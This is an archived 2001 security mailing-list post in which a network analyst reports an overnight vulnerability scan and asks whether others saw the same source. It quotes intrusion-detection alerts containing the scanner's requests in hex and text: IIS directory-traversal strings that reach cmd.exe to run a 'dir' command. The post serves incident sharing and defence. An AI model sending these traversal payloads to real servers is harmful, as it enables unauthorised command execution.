Okay though, you have probably seen this 200 or 300 times over. Though I just wanted to add this for anyone who is keeping a database of incidents. On Jun 26, 2001 we received the following vulnerability scan, on our servers, which lasted approximately 22 minutes, and attempted to connect to every server we have. Though I would like to know if anyone else was hit by this person? Jason TRACE [**] WEB-MISC http directory traversal [**] Jun 26,01 02:54:48am 202.96.119.134:38331 -> x.x.x.x:80 TTL: 234 TOS: 0x0 ID:60075 ***AP*** Seq: 1161185518 Ack: 1704311082 Win: 8760 474554202F736372697074732F2E2E25632E2E2F GET./scripts/..%c../ 77696E6E742F73797374656D33322F636D642E65 winnt/system32/cmd.e 78653F2F632B64697220485454502F312E300D0A xe?/c+dir.HTTP/1.0.. 0D0A .................... [snip] [**] WEB-FRONTPAGE fourdots request [**] Jun 26,01 02:58:08am 202.96.119.134:54761 -> x.x.x.x:80 TTL: 234 TOS: 0x0 ID:44929 ***AP*** Seq: 794224914 Ack: 2261806000 Win: 8760 474554202F6D736164632F2E2E2565302E2E2F2E GET./msadc/..%e0../. 2E662E2E2E2E2F2E2E3025382E2E2F77696E6E74 .f..../..0%8../winnt 2F73797374656D33322F636D642E6578653F2F63 /system32/cmd.exe?/c 2B64697220485454502F312E300D0A0D0A +dir.HTTP/1.0....... [snip] --- Jason Robertson Network Analyst jasonat_private http://www.astroadvice.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Jun 28 2001 - 17:29:40 PDT